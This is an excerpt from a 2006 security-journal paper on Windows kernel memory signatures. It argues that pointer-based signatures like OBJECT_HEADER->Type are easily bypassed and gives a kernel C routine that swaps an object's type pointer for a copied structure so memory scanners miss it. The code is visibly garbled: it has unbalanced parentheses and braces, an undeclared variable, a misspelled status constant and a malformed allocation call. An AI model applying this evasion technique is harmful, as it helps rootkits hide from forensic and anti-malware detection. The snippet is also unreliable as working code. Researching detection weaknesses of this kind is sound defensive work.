Uninformed: Informative Information for the Uninformed

Vol 4» 2006.Jun

Pointer Based Signatures

Using a memory signature which is a valid pointer to some common object or static data is a very appealing signature to use for detection due to its reliability, however is also an easy signature to bypass. The following demonstrates the most simplistic method of bypassing the OBJECT_HEADER->Type signature this paper uses as a generic object memory signature. This is possible because the OBJECT_TYPE is just an allocated structure of fairly stable data. Many pointer based signatures with similar static characteristics are open to the same attack.

NTSTATUS KillObjectTypeSignature (
    IN  PVOID   Object
    NTSTATUS        ntStatus = STATUS_SUCESS;
    PVOID           pDummyObject;

    pHdr = OBJECT_TO_OBJECT_HEADER( Object );

    pDummyObject = ExAllocatePool( sizeof(OBJECT_TYPE) );

    RtlCopyMemory( pDummyObject, pHdr->Type, sizeof(OBJECT_TYPE) );

    pHdr->Type = pDummyObject;

    return STATUS_SUCCESS;